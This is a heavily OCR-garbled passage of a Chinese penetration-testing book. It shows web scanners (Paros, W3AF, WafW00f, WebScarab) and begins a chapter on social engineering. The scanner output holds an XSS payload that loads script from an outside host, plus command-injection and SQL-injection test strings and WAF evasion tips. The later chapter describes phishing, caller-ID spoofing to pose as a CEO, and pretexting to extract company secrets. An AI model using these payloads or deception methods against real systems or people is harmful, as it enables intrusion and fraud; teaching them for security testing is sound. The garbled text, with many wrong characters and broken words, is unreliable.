Web Applications |Web Application Proxies | Paros， 或 者 在 终端 中 使 用 下 
述 指令 。 


# paros 


上 壕 指 令 将 加 载 Paros Proxy 程 序 的 图 形 窗 口 。 在 开始 测试 前 ， 你 需 
要 在 浏览 器 中 设置 本 地 代理 ， 即 设置 代理 的 IP A 127.0.0.1, WOA 
8080。 如 需 调 整 默 认 设置 ， 可 在 亲 单 Tools | Options 中 调整 连接 设置 、 
本 地 代理 的 设置 、HTTP 认 证 和 其 他 相关 设置 。 在 设置 好 浏 贤 絮 之 后 ， 
就 可 以 访问 目标 网 页 了 。 使 用 Paros Proxy 进 行 漏洞 测试 的 具体 步骤 如 
am 

1. 在 本 例 中 ， 我 们 访问 http://testphp.targetdomain.com。 此 后 ， 
Paros Proxy 的 Sites 选 项 卡 里 显示 这 个 网 址 。 

2. 使 用 鼠标 右键 单 击 http://testphp.targetdomain.com 并 选择 Spider， 
以 爬虫 方式 分 析 整 个 网 站 的 网 址 。 扫 摘 网 址 的 时 间 取 决 于 网 站 的 页 面 

3. 在 程序 抓 取 完 网 址 之 后 ， 您 可 通过 底部 的 Spider 标签 查看 所 有 抓 
取 到 的 网 址 信息 。 此 外 ， 也 可 以 通过 在 Sites 选 项 卡 中 选择 特定 网 站 的 
网 页 ， 以 跟 路 其 请 求 和 响应 。 

4. 您 在 右 侧面 板 中 的 Trap 选项 卡 中 ， 调 查 特 定 的 请 求 和 响应 的 啊 
应 。 在 对 目标 应 用 程序 进行 手动 测试 时 ， 这 项 功能 尤其 有 用 。 此 外 ， 
您 可 通过 菜单 Tools | Manual Request Editor ， 手 工 构建 一 个 HITP 请 
求 o 

5. 在 Sites 选项 卡 里 选中 目标 网 站 ， 然 后 在 茉 单 中 选择 Analyze | 
Scan Al， 可 对 选 定 网 站 进行 目 动 化 的 漏洞 测试 。 另 外 ， 您 还 可 以 在 
Analyze | Scan Policy 指定 安全 测试 的 特定 类 型 ， 然 后 使 用 单独 的 
Analyze | Scan 功能 进行 特定 类 型 的 安全 测试 (而 不 是 Scan All 进行 的 
那 种 全 面 测试 ) 

6. 在 程序 完成 漏洞 测试 之 后 ， 您 可 在 底部 的 Alerts 选项 卡 中 看 到 大 
量 的 安全 警告 。 依 照 其 危害 程度 ， 这 些 漏 洞 被 分 为 High、Low 和 
Medium =F#2 5!) ° 


7. 如 需 查 看 上 次 扫描 结果 的 报告 ， 可 打开 沫 单 Report | Last Scan 
Report。 它 将 会 把 本 此 测试 发 现 的 所 有 漏洞 保存 为 网 页 格式 文 
件 /root/paros/session/LatestScannedReport.htm ° 

在 本 例 中 ， 我 们 仅 进 行 了 基本 的 漏洞 评估 测试 。 如 需 获 取 Paros 
Proxy 选 项 的 详细 说 明 ， 请 访问 其 官方 的 用 户 手册 ， 地 址 为 
http://www.i-pi.com/Training/SecTesting/paros user guide.pdf ° 

4. W3AF 

W3AF 是 一 款 功能 丰富 的 Web 应 用 程序 攻击 和 审计 框架 ， 它 主要 用 
于 探测 和 利用 web 漏洞 。 它 实现 了 全 自动 化 的 应 用 程序 安全 评估 过 程 。 
整个 框架 的 设计 理念 遵循 了 下 述 三 个 主要 的 操作 步骤 : 识别 、 审 计 和 
攻击 。 在 进行 每 个 操作 步骤 时 ， 审 计 员 都 可 使 用 其 提供 的 注重 特定 测 
试 标准 的 功能 插件 。W3AF 的 这 些 插件 实现 了 互相 之 间 的 通信 和 数据 
共享 ， 有 助 于 协同 完成 测试 任务 。 它 可 检查 、 利 用 的 web 应 用 程序 漏洞 
包括 SQL 注 入 、 跨 站 脚本 、 远 程 和 本 地 文件 包含 、 绥 冲 区 次 出 、XPath 
注入 、 操 作 系统 命令 、 错 误 的 应 用 配置 等 。 有 关 各 个 插件 的 详细 信 
息 ， 请 查询 http://w3af.sourceforge.net/plugin-descriptions.php ° 

i Ao) W3AFE， 可 在 晶 面 染 单 中 依次 选中 Kali Linux | Web 
Applications | Web Vulnerability Scanners | w3af (Console), ， 或 在 终端 中 
使 用 下 述 指令 。 

# w3af console 

上 述 命 令 将 进入 到 W3AF 特 有 的 控制 台 模 式 (提示 和 从 为 
w3af>>>) 。 虽 然 在 桌面 菜单 里 也 有 这 个 程序 的 GUI 版 本 ,但 是 考虑 到 
操作 灵活 性 ， 我 们 倾向 于 使 用 它 的 控制 台 版 本 。 

w3af>>> help 

上 壕 指 令 将 显示 配置 w3af 测 试 所 需 的 基本 选项 。 在 需要 查看 帮助 
时 ， 可 随时 使 用 help 命 令 查 看 特定 选项 的 说 明 信 息 。 本 例 首 先 配 置 


output 插件 ， 然 后 局 用 特定 的 audit 测 斌 选项， 设置 target 并 对 目标 网 站 
进行 扫 摘 。 相 关 指 令 如 下 。 
w3af>>> plugins 
w3af/plugins>>> help 
w3af/plugins>>> output 
w3af/plugins»»- output console, htmlFile 
w3af/plugins»»» output config htmlFile 
w3af/plugins/output/config:htmlFile>>> help 
waaf/plugins/output/config:htmlFile>>> view 
w3af/plugins/output/config:htmlFile>>> set verbose True 
w3af/plugins/output/config:htmlFile>>> set fileName testreport.html 
w3af/plugins/output/config:htmlFile>>> back 
w3af/plugins»»- output config console 
w3af/plugins/output/config:console>>> help 
w3af/plugins/output/config:console>>> view 
w3af/plugins/output/config:console>>> set verbose False 
w3af/plugins/output/config:console>>> back 
waaf/plugins>>> audit 
w3at/plugins>>> audit htaccessMethods, osCommanding, sqli, xss 
waaf/plugins>>> back 
w3af>>> target 
waaft/config:target>>> help 
waaf/config:target>>> view 
waaf/config:target>>> set target http://testphp.example.com/ 
waaf/config:target>>> back 


w3af»»» 


我 们 通过 上 述 指令 调整 好 了 各 项 参数 。 然 后 ， 我 们 将 通过 下 述 指 
令 ， 评 估 目 标的 SQL 注入 、 路 站 脚本 、 操 作 系统 命令 、htaccess 错 误 配 
等 漏洞 的 安全 问题 。 

w3af>>> start 

Auto-enabling plugin: grep.error500 

Auto-enabling plugin: grep.httpAuthDetect 

Found 2 URLs and 2 different points of injection. 

The list of URLs is: 

- http://testphp.example.com/ 

- http://testphp.example.com/search.php?test=query 

The list of fuzzable requests is: 

- http://testphp.example.com/ | Method: GET 

- http://testphp.example.com/search.php?test=query| Method: 

POST|Parameters:(searchFor="") 

Starting sqli plugin execution. 

Starting osCommanding plugin execution. 

A possible OS Commanding was found at: 
"http://testphp.example.com/search.php ?test=query", using 
HTTP method POST. The sent post-data was: 
"searchFor=run+ping+-n+3+localhost & goButton=go".Please review 

manually. 

This information was found in the request with id 22. 

Starting xss plugin execution. 

Cross Site Scripting was found at: 
"http://testphp.example.com/search.php?test-query", 
using HTTP method POST. The sent post-data was: 


"searchFor=<ScRIPt/SrC=http://x4Xp/x.js></ScRIPt> & 
goButton=go". 
This vulnerability affects Internet Explorer 6,Internet Explorer 
7,Netscape with IE rendering engine,Mozilla Firefox,Netscape with 
Gecko rendering engine. 
This vulnerability was found in the request with id 39. 
Starting htaccessMethods plugin execution. 
Finished scanning process. 
上 述 信息 表明 ，W3AEF 发 现 该 web 应 用 程序 存在 多 个 严重 的 安全 漏 
洞 。 我 们 已 经 在 配置 中 指定 好 了 测试 报告 的 文件 名 ， 该 文件 位 
"T /pentest/web/w3af/testreport. html。 扫 描 报告 会 列 出 所 有 漏洞 的 全 部 细 
节 ， 其 中 包括 W3AF 程序 和 目标 Web 应 用 程序 之 间 每 个 请 求 信 息 、 相 
应 啊 应 、 所 传递 的 数据 以 及 调试 信息 等 。 本 例 没 有 使 用 别 的 的 插件 
(plugins) 、 配 置 文 件 (profiles) 和 漏洞 利用 (exploit) 选项 。 因 此 ， 
本 书 强烈 建议 读者 参考 官方 的 用 户 指 南 ， 进 行 各 种 练习 。 官 方 手册 的 
$ 载 网 tk 是 http://w3af. 
sourceforge.net/documentation/user/w3afUsersGuide.pdf ° 
5. WafWOOf 
WafW00f 是 检测 Web 应 用 程序 防火 墙 (WAF) 的 Python 脚本 程序 。 
在 评估 WAEF 保 护 的 目标 主机 时 ， 许 多 漏洞 评估 技术 都 难以 委 效 ;而 这 
正 是 wafWw00f 程 序 擅长 的 测试 环境 。 部 署 于 应 用 服务 器 和 Internet 流 量 
之 间 的 WAF 防 火 墙 ， 不 仅 提高 了 测试 策略 的 难度 ， 同 时 还 使 渗透 测试 
人 员 开 发 的 高 级 规避 技术 面临 了 新 的 挑战 。 
如 需 局 动 WafW00f 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 
# wafwOOf 
上 述 指 令 将 在 显示 右上 显示 人 简单 的 使 用 说 明 ， 以 及 几 个 典型 的 指 
令 范 例 。 本 例 中 ， 我 们 将 通过 下 述 指 令 ， 分 析 目 标 网 站 是 否 使 用 WAF 


系统 。 

# wafw00f http://www.example.net/ 

WAFWOOF - Web Application Firewall Detection Tool 
By Sandro Gauci & & Wendel G. Henrique 

Checking http://www.example.net/ 

The site http://www.example.net/ is behind a dotDefender 

Number of requests: 5 

上 述 信 息 表 明 ， 目 标 应 用 程序 服务 器 处 于 防火 墙 的 保护 之 下 ( 例 
如 ，dotDefender) 。 通 过 这 些 信息 ， 我 们 可 以 进一步 地 调查 规避 WAF 
规则 的 方法 。 这 可 能 涉及 一 些 如 HTTP 参 数 污染 、 空 字 节 替换 、 规 范 化 
处 理 、 使 用 十 六 进 制 字符 或 Unicode 字 符 对 恶意 URL 进 行 编码 等 技术 。 

6. WebScarab 

WebScarab 是 一 款 功能 强大 的 Web 应 用 程序 的 安全 评估 工具 。 它 
有 多 种 操作 模式 ， 主 要 模式 为 拦截 代理 。 将 WebScarab 代 理 部 署 于 终端 
用 户 浏览 右 和 目标 Web 应 用 程序 之 间 ， 可 监控 、 修 改 二 者 之 间 的 请 求 和 
回应 。 审 计 人 员 可 以 手动 构造 连接 请 求 ， 然 后 检查 目标 Web 应 用 程序 返 
回 的 啊 应 信息 。WebScarab 集成 了 诸多 工具 ， 这 些 工 具 包括 fuzzer、 
session ID analysis ^ spider ^ web services analyzer ^ XSS 和 CRLF 漏洞 
扫描 器 和 transcoder 等 程序 ° 

如 需 启 动 WebScarab Lite 程 序 ， 可 在 蝎 面 染 单 里 依次 选中 Kali Linux 
| WebApplications |Web Vulnerability Scanners | webscarab, ， 或 在 终端 中 
使 用 下 述 指令 。 

# webscarab 

上 未 指令 将 执行 精简 版 的 WebScarab。 根 据 本 例 的 需要 ， 我 们 通过 
菜单 Tools | Use full-featured interface 令 程 序 显示 全 部 的 功能 选项 。 程 
序 将 询问 您 是 否 局 用 这 项 功能 ， 然 后 会 重启 该 应 用 程序 。 再 次 启动 之 
后 ，WebScarab 的 界面 上 将 新 增 很 多 工具 的 选项 卡 。 在 开始 评估 工作 之 


前 ， 我 们 应 调整 浏览 器 程序 ， 使 其 使 用 本 地 代理 服务 器 (127.0.0.1, 
8080) ， 以 使 得 浏览 器 通过 WebScarab 的 拦截 代理 访问 目标 主机 。 另 
外 ， 您 可 以 在 Proxy | Listeners3/6Jyi- rp Va S AH CIR OS as A ARIE 
UP 地 址 或 端口 ) 。 使 用 WebScarab 程 序 分 析 目 标 应 用 程序 的 session ID 

的 步骤 如 下 。 

1. 设置 好 浏 哎 强 的 代理 服务 器 选项 之 后 ， 您 可 使 用 浏览 如 访问 目 
标 网 站 (例如 http://testphp.targetdomain.com/) ， 并 访问 尽 可 能 多 的 链 
接 。 浏 览 的 页 面 越 多 ， 发 现 已 知 和 未 知 漏洞 的 机 会 也 束 越 大 。 除 了 这 
种 方法 ， 您 还 可 在 Summary 选 项 卡 中 使 用 鼠标 右键 点 击 目标 网 站 ， 然 
后 选择 Spider tree; 此 后 ， 程 序 将 自动 查找 目标 应 用 程序 的 所 有 可 用 链 
fx © 

2. 如 有 果 想 检查 特定 页 面 的 请 求 和 响应 数据 ， 可 单 击 底部 的 
Summary 标 签 。 程 序 将 表格 的 形式 显示 原始 的 和 解析 过 的 浏览 器 请 
求 。 此 外 ， 您 还 可 以 看 到 以 HTML、XML、TEXT 和 Hex 格 式 显示 的 响 
应 信息 。 

3. 在 测试 过 程 中 ， 我 们 决定 对 目标 应 用 程序 链接 中 的 某 个 参数 

(例如 ，artist=1) 以 GET 请 求 进行 模糊 测试 。 这 种 测试 有 助 于 找到 未 

被 发 现 的 漏洞 。 我 们 使 用 鼠标 右键 点 击 选 定 的 链接 ， 并 选择 Use as fuzz 
template。 然 后 转 到 Fuzzer wei, Parameters 附近 的 Add 按钮， 
人 工 添 加 需要 进行 模糊 测试 的 参数 。 在 本 例 中 ， 我 们 写 了 一 个 小 型 文 
本 文件 ， 这 个 文件 含有 已 知 的 SQL 注入 数据 (例如 ，1 AND1=2、 
1AND1=1、 单 引号 [?]) ， 然 后 指定 这 个 文本 文件 作为 模糊 测试 的 参数 
值 。 这 种 指定 操作 可 通过 Fuzzer 选 项 卡 下 的 Sources 按 钮 完成 。 准 备 好 
模糊 测试 数据 后 ， 我 们 点 击 Start 开始 测试 。 所 有 测试 完成 后 ， 可 以 双 
击 单个 请 求 以 检查 其 相应 的 啊 应 。 我 们 在 本 例 中 发 现 了 MySQL 注 入 漏 
洞 。 


Error: You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use near 
\" at line 1 Warning: mysql fetch array():supplied argument is not a valid 
MySQL result resource in /var/www/vhosts/default/htdocs/listproducts.php 
on line 74 

4. 最 后 ， 我 们 分 析 目 标 应 用 程序 的 session ID。 我 们 选中 Session ID 
Analysis 选 项 卡 ， 并 在 组 合 框 中 选中 Previous Requests。 等 程序 加 载 了 特 
定 请 求 之 后 ， 我 们 在 底部 设 定 采 样 次 数 (例如 ，20) 。 然 后 点 击 Fetch 
按钮 开始 对 session ID 进行 采样 。 之 后 ， 点 击 Test 按 钮 对 样本 进行 分 析 。 
而 后 ， 可 在 Analysis 选 项 卡 下 看 到 分 析 结 果 。 些 外， 我 们 可 在 
Visualization 选项 卡 几 看 到 相应 的 可 视 化 分 析 。 这 种 分 析 用 于 判断 
session ID 的 杂 化 程度 和 不 可 预期 性 。 上 述 指 标 如 果 不 理想 ， 就 可 能 引 
发 通过 某 session ID 支持 他 人 session 或 获取 他 人 认证 信息 的 事故 。 

WebScarab 另 有 大 量 的 选项 和 其 他 的 功能 ， 它 们 有 助 于 我 们 提高 对 
渗透 测试 的 认识 。 有 关 WebScarab 项 目的 更 多 信息 ， 请 访问 
http://www.owasp.org/index.php/Category: OWASP_WebScarab_Project ° 

7.9 本 章 总 结 


本 章 通过 Kali Linux 中 的 多 款 工 具 ， 曾 述 了 识别 和 分 析 关 键 安全 漏 
洞 的 具体 方法 。 有 关 篇 幅 介 绍 了 安全 漏洞 的 三 大 类 型 : 设计 类 漏洞 、 
实施 类 漏洞 和 运营 类 漏洞 ， 以 及 安全 漏洞 的 两 大 种 类 : 本 地 漏洞 和 远 
程 漏 洞 。 然 后 ， 本 文 简要 介绍 了 几 种 安全 漏洞 的 分 类 标准 。 这 些 标 谁 
依据 缺陷 的 普遍 共性 对 漏洞 进行 了 总 结 ， 是 安全 审计 人 员 所 遵循 的 分 
类 标准 。 为 了 指导 漏洞 评估 的 具体 工作 ， 本 文 列 举 了 几 款 结合 自动 检 
验 技 术 和 手动 检验 技术 的 评估 工具 ， 并 依据 其 特定 的 审计 技术 对 这 些 
工具 进行 了 分 类 。 本 章 介 绍 的 工具 有 OpenVAS (集合 了 所 有 功能 的 评 


fH LR) 、Cisco 分 析 工 具 、 模 糊 分 析 工 具 、SMB 分 析 工 具 、SNMP 工 
具 和 Web 应 用 程序 安全 评估 工具 。 

下 一 章 将 讨论 欺骗 的 艺术 ， 即 利用 人 性 的 弱点 获取 目标 信息 的 各 
种 方法 。 虽 然 并 非 每 次 评估 工作 都 涉及 这 些 工 作 ， 但 在 缺乏 目标 信息 
时 有 关 技 术 束 显得 十 分 必要 。 


第 8 章 社会 工程 学 攻击 


‘Le REF ce FA ATES RS > REA ME BASRA IZ, 
Mile ae 在 缺少 目标 系统 的 必要 信息 时 ， 社 会 工程 学 技 

透 测 试 人 员 获 取信 息 的 至 关 重 要 的 手段 。 对 所 有 类 型 的 组 织 
单位 ) 而 言 ， 人 都 是 安全 防范 措施 里 最 薄弱 的 一 环 ， 也 是 整个 安全 
基础 设施 最 脆弱 的 层面 。 人 都 是 社会 的 产物 ， 人 的 本 性 就 是 社会 性 ， 
所 以 人 都 有 社会 学 方面 的 弱点 都 易 受 社会 工程 学 攻击 。 社 会 工程 学 的 
攻击 人 员 通 常 利用 社会 工程 学 手段 获取 机 密 信息 ， a AM 
区 域 。 社 会 工程 学 的 方式 多 种 多 样 ， 而 且 每 种 方法 的 效 末 和 导 癌 完 
取决 于 使 用 人 员 的 想象 能 力 。 本 章 将 阐述 社会 工程 学 核心 原则 ， 并 会 
介绍 专业 的 社会 工程 攻击 人 员 用 其 操纵 他 人 或 挖掘 信息 的 实例 。 

本 章 分 为 以 下 几 个 部 分 : 

e 透 过 心理 学 的 基本 原理 ， 市 领 读 着 大 致 了 解 社 会 工程 学 的 手段 和 
目标 。 

e 通过 几 个 真实 的 例子 ， 演 示 社 会 工程 学 的 攻击 过 程 及 使 用 方法 。 

从 安全 角度 来 看 ， 社 会 工程 学 是 以 获取 特定 信息 为 目标 的 操纵 他 
人 的 有 力 武器 。 很 多 单位 都 使 用 社会 工程 学 的 方法 进行 安全 评估 ， 以 
考核 雇员 的 安全 完整 性 ， 并 通过 这 种 方法 调查 工作 流程 和 人 员 方 面 的 
安全 弱点 。 需 要 注意 的 是 ， 社 会 工程 学 是 种 很 常见 的 技术 ， 可 以 说 各 
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种 人 员 都 会 使 用 这 种 技术 。 无 论 是 渗透 测试 人 员 ， 还 是 诈骗 专家 、 身 
份 鳃 贼 、 商 业 合 作 伙伴 、 求 职 人 员 、 销 售 人 员 、 信 息 经 纪 人 、 电 话 推 
销 员 、 政 府 间 谍 、 心 怀 不 满 的 员工 ， 甚 至 日 常生 活 中 的 孩童 都 会 使 用 
这 种 技术 ， 只 是 他 们 的 动机 不 同 而 已 。 


8.1 人 类 心理 学 建 模 


人 类 的 心理 取决 于 感官 的 输入 。 感 官 的 作用 是 形成 对 现实 的 感 
知 。 按 照 感 官 对 自然 现象 的 识别 作用 来 划分 ， 人 的 感官 可 分 成 视觉 、 
听觉、 味觉 、 触 觉 、 串 党、 平衡 和 加 速 、 温 度 、 动 常 、 疼 痛感 和 方 癌 
感 的 感官 。 人 类 正 是 利用 、 发 展 他 们 的 这 些 感官 的 功能 ， 得 以 感知 外 
部 世界 。 站 在 社会 工程 学 的 立场 ， 任 何 通过 显 性 感觉 (视觉 或 听 
觉 ) 、 有 眼睛 的 动作 (眼神 接触 、 口 涉 上 的 差异 、 有 有 眼 频率 或 眼睛 暗 
示 ) 、 面 部 表情 (RE SEC NIB SED) TUR BORO) Ef 
象 实 体 进行 观察 或 感觉 收集 到 的 信息 ， 都 可 增加 成 功 获 取 目 标 信 息 的 
概率 。 大 多 数 情况 下 ， 社 会 工程 学 工程 师 必 须 直 接 与 目标 进行 沟通 ， 
才能 获取 机 密 信 息 或 受 限 区 域 的 访问 权 。 沟 通 形 式 可 以 是 直接 见面 的 
接触 方式 ， 也 可 以 是 通过 电子 辅助 技术 进行 的 不 见面 接触 方式 。 在 实 
际 工作 中 ， 和 常见 的 沟通 方式 分 为 两 类 : 面谈 或 问 询 。 但 是 ， 这 两 种 方 
法 都 受到 其 他 因素 的 制约 ， 例 如 环境 因素 、 对 目标 的 熟悉 程度 和 控制 
沟通 模式 的 能 力 。 所 有 这 些 因 素 (沟通 、 环 境 、 知 识 和 沟通 模式 控 
制 ) 构成 社会 工程 学 工程 师 必 备 的 基本 技能 。 整 个 社会 工程 学 活动 取 
决 于 攻击 者 与 目标 之 间 的 信任 关系 。 如 果 不 能 与 目标 建立 足够 的 信任 
关系 ， 则 所 有 的 努力 都 可 能 付 之 东 流 。 

现在 ， 社 会 工程 学 已 经 形成 了 一 门 独立 学 科 。 有 关 社 会 工程 学 框 
ZH (Social Engineering Framework) 的 详细 信息 ， 请 访问 作者 的 官方 网 
站 : http://www.social-engineer.org/ ° Christopher Hadnagy i2 E EXT W] 
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众 开 放 ， 以 便于 他 人 继续 研究 社会 工程 学 攻击 的 具体 方法 。 如 果 需 要 
对 用 户 进行 安全 塔 训 ， 可 参考 有 关 资 料 。 


8.2 攻击 过 程 


本 世 将 介绍 一 些 发 动 社 会 工程 学 攻击 的 基本 步骤 。 虽 然 这 不 是 社 
会 工程 学 攻击 的 唯一 方法 ， 甚 至 可 以 说 没有 成 功率 高 的 正式 方法 ， 但 
TEAN NAE APA CTS Te BAL LAER ASA * 情报 收集 、 

识别 漏洞 、 规 划 攻 击 和 执行 攻击 一 一 社会 工程 学 工程 师 通常 都 会 采用 
这 些 某 本 步骤 ， 它 们 可 有 效 获 取 目 标的 有 关 信 息 或 访问 权限 。 

1. 情报 收集 : 多 种 技术 部 可 用 于 找到 最 容易 攻破 的 渗透 测试 目 
a 
通过 社交 网 络 收集 被 测 单位 员工 的 个 人 信息 ; 识别 被 测 单位 组 织 使 用 
的 第 三 方 软件 包 ; 参与 他 们 的 经 各 活动 、 社 区 活动 和 参加 其 会 议 等 。 
以 这 些 方式 提供 的 情报 ， 能 够 准确 地 推测 出 社会 工程 学 意义 上 的 “ 线 
Ko 

2. 识别 漏洞 : 一 旦 选 定 了 关键 线 人 ， 接 下 来 就 开始 与 对 方 建立 信 
任 关 系 和 友 证 。 这 样 束 可 以 在 不 伤害 、 不 慰 动 目标 的 情况 下 ， 截 获 被 
测 单 位 的 机 密 信息 。 保 持 行动 的 隐蔽 性 和 保密 性 ， 对 于 整个 过 程 来 说 
至 关 重 要 。 男 外 ， 也 可 以 调查 个 测 单位 古 否 使 用 了 旧版 本 软件 ， 继 而 
通过 恶意 的 E-mail 或 Wep 内 容 ， 利 用 软件 漏洞 感染 当事人 的 计算 机 。 

3. 规划 攻击 : 您 可 以 对 目标 采取 直截了当 的 攻击 方式 ， 也 可 以 利 
用 电子 辅助 技术 被 动 地 攻击 目标 。 以 这 些 挖掘 出 来 的 情报 入 口 痢 手 ， 
我 们 可 以 轻松 地 拟定 攻击 路 径 和 攻击 方法 。 例 如 ， 被 测 单 位 的 客户 服 
务 代 表 Bob 和 我 们 的 天 系 很 好 ， 他 还 信任 我 们 ， 他 束 可 能 在 计算 机 上 的 


行 我 们 发 送 的 E-mail 附件 ， 而 这 种 攻击 不 需要 高 级 管理 人 员 的 任何 事前 
HAL © 

4. 执行 攻击 : 社会 工程 学 攻击 的 最 后 一 步 是 执行 攻击 计划 。 此 
时 ， 我 们 应 该 保持 足够 的 信心 和 耐心 ， 主 动 监 控 和 评估 工作 成 果 。 完 
成 这 一 步 之 后 ， 社 会 工程 学 工程 师 掌 握 了 充分 信息 ， 其 至 可 以 访问 被 
测 单位 的 内 部 系统 ， 这 些 成 果 足 以 让 他 们 进一步 地 渗透 被 测 单位 。 在 
成 功 执行 攻击 计划 之 后 ， 社 会 工程 学 的 攻击 束 可 宣告 结束 。 


8.3 攻击 方法 


社会 工程 学 中 ， 有 5 种 有 助 于 理解 、 识 别 、 结 交 、 准 备 目标 的 攻击 
方法 。 社 会 工程 学 按照 它们 的 符 点 ， 将 它们 进行 了 归 类 。 本 市 介绍 了 
一 些 真 实 的 案例 ， 以 帮助 读者 在 实际 情况 中 灵活 运用 各 种 所 需 方法 。 
请 注意 这 些 攻击 方法 针对 的 是 个 人 的 心理 学 因素 ， 要 想 提 高 这 些 方 法 
的 效用 ， 束 应 该 进行 定期 的 训练 和 练习 。 


8.3.1 冒名 顶替 


攻击 人 员 篆 芝 假 装 成 他 人 以 获取 对 方 的 信任 。 例 如 ， 在 获取 目标 
人员 的 银行 信息 方面 ， 只 要 目标 人 员 使 用 E-mail, RIIA AHTS 
鱼 攻击 。 这 种 攻击 属于 近乎 完美 的 攻击 方案 。 当 决定 使 用 钓鱼 攻击 之 
后 ， 攻 击 人 员 要 大 量 地 收集 目标 人 员 用 过 的 E-mail 地 址 ， 然 后 伪造 出 
与 原 银 行 界 面 一 样 的 网 页 界面 ， 以 诱骗 目标 人 员 。 

完成 了 以 上 准备 之 后 ， 攻 击 人 员 会 草拟 并 发 送 一 份 正式 行文 的 E- 
mail 〈《 例 如， 银行 账户 更 新 通知 ) 。 这 些 E-mail 看 上 去 束 像 真正 银行 发 
出 来 的 邮件 ， 要 求 目 标 人 员 访 问 某 网 址 更 新 账户 信息 。 不 过 ， 邮 件 提 
到 的 网 址 将 把 目标 人 员 提 交 的 信息 转发 给 攻击 人 员 。 攻 击 人 员 事 先 掌 
握 了 特定 的 Web 技术 ， 他 们 使 用 多 种 先进 的 工具 (例如 SSLstrip) Wi 
可 以 通过 目 动 化 手段 轻松 有 效 地 达成 预定 任务 。 与 那些 借助 他 人 帮助 
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顶 奉 的 目的 。 
8.3.2 投 桃 报 李 
通过 利益 交换 的 方式 达成 双方 各 目 利 益 的 行为 ， 被 称 为 投 桃 报 
李 。 这 类 攻击 需要 长 期 业务 合作 达成 的 非 正式 (私人 ) 关系 。 利 用 公 
司 之 间 的 信任 关系 ， 可 以 轻松 地 找到 可 获取 特定 信息 的 目标 人 员 。 例 
如 Bob 是 一 个 专业 黑客 ， 他 想 知 道 ABC 公 司 办 公 大 楼 的 物理 安全 案 上 略 。 
进行 仔细 考察 之 后 ， 他 决定 制作 一 个 廉价 销售 古玩 的 网 站 ， 以 吸引 两 
名 雇员 的 关注。Bob 可 事先 通过 社交 网 站 掌握 这 两 人 的 个 人 信息 ， 了 
解 他 们 的 E-mail 地 址 、 网 络 论坛 等 资料 。 在 这 两 人 之 中 ，Alice 在 Bob 
的 网 站 上 定期 采购 商品 ， 成 为 了 Bob 的 主要 目标 。Bob 决 定 要 以 一 件 稀 
有 古董 换取 她 们 公司 的 内 部 文件 。 利 用 人 类 心理 学 因素 ， 他 将 向 Alice 
发 送 了 E-mail， 以 转让 这 件 稀有 古董 为 筹码 ， 要 求 Alice 提 供 ABC 公 司 
的 物理 安全 策略 。 在 混 消 了 工作 黄 任 和 个 人 利益 的 状态 下 ，Alice 把 公 
司 信息 透露 给 了 Bob。 在 创建 验 局 的 同时 ， 通 过 价值 交换 的 事情 强化 私 
人 关系 ， 可 成 为 社会 工程 学 攻击 的 有 效 手 段 。 


8.3.3 狐 假 虎威 


冒充 目标 单位 业务 负责 人 的 喘 份 从 而 干预 正常 业务 的 做 法 束 是 狐 ° 

假 虎 威 。 有 些 人 认为 ， 这 种 攻击 方法 属于 冒名 顶 蔡 的 一 种 特例 。 人 们 
会 出 于 本 能 下 意识 地 接受 权威 和 高 级 管理 人 员 的 指示 ， 这 个 时 候 他 们 
会 无 视 目 己 否 定性 的 直觉 。 这 种 天 性 使 我 们 容易 在 特定 的 威胁 面前 宣 
无 抵抗 力 。 例 如 ， 某 人 要 通过 XYZ 公 司 的 网 络 管理 员 获 取 网 络 认 证 的 
技术 细 市 。 经 过 一 段 时 间 的 专注 分 析 ， 他 可 以 通过 利益 交换 方法 获得 
网 络 管理 员 和 CEO 的 电话 号 码 。 后 来 ， 他 使 用 来 电 号 人 码 的 伪造 服务 
(例如 ，www.spoofcard.com) 给 网 络 管理 员 打 电话 。 此 时 ， 网 管 会 认 
为 该 电话 来 目 CEO， 将 遵从 攻击 人 员 的 指示 。 这 种 假冒 权威 人 员 续 份 


的 狐 假 虎威 的 做 法 ， 利 用 了 目标 人 员 必 须 遵 从 公司 高 级 管理 人 员 指 示 
的 规律 ， 诱 导 目 标 人 员 泄 露 信 息 。 


8.4 I DLE 


人 们 常 说 “机 不 可 失 *”， 他 们 特别 天 注 所 谓 机 不 可 失 的 宝贵 机 会 。 
这 些 想 法 都 是 人 性 信 禁 一 面 的 写照 。 唉 以 重 利 的 方法 利用 了 人 们 淘 求 
谋 利 机 会 的 信 禁 心理 。 著 名 的 Nigerian 419 Scam (www.419eater.com) 
是 利用 人 类 信 欲 的 典型 例子 。 让 我 们 举 一 个 例子 ，Bob 想 要 收集 XYZ 大 
学 里 学 生 的 个 人 信息 。 在 他 获取 所 有 学 生 的 E-mail 地 址 的 情况 下 ， 他 可 
以 向 学 生 们 发 送 邮件 并 宣告 : 提供 个 人 信息 (姓名 、 地 址 、 电 话 、 电 
子 邮 件 、 出 生日 期 、 护 照 号 码 等 ) 将 免费 获 赠 iPod。 由 于 这 个 创意 专 
门 针 对 在 校 学 生 设计 ， 而 且 足 以 使 他 们 确信 和 能够 免费 获得 最 新 的 
iPod， 所 以 多 数 的 在 校 学 生 会 落 入 这 个 允 局 。 在 企业 界 ， 相 应 的 攻击 方 
法 通 名 或 吹 可 以 获得 最 大 商业 收益 ， 达 成 业务 目标 。 


8.5 社会 关系 


作为 人 ， 我 们 需要 某 种 形式 的 社会 关系， 以 分 享 思 想 、 感 情 和 想 
法 。 社 会 天 系 最 易 受 攻击 的 部 分 是 “性 *”。 多 数 情况 下 ， 异 性 总 是 互相 
吸引 。 由 于 这 种 强烈 的 感情 和 信任 的 错觉 ， 人 们 可 能 在 不 意 间 向 对 手 
透露 信息 。 很 多 线 上 的 社交 门户 网 站 都 提供 了 见面 和 聊天 的 服务 ， 以 
促进 用 户 间 的 社会 交际 。Facebook、MySpace、Twitter、Orkut 等 网 站 
都 是 如 此 。 例 如 ，XYZ 公 司 聘 请 了 Bob， 要 他 获取 ABC 公 司 财务 案 上 略 
和 市 场 膏 销 战略 以 保持 目 身 的 竞争 优势 。 他 首先 查找 对 方 公司 的 座 员 
信息 ， 发 现 ABC 公司 负责 所 有 业务 运 香 的 人 是 一 个 叫 作 Alice 的 女 
孩 。 因此 ， 他 假装 是 一 个 普通 的 工商 学 的 研究 生 ， 试 图 与 Alice 取 得 联 
系 (例如 ， 通 过 Facebook) ° 后 来 ，Bob 鞭 意 营造 遇见 Alice 的 机 会 ， 
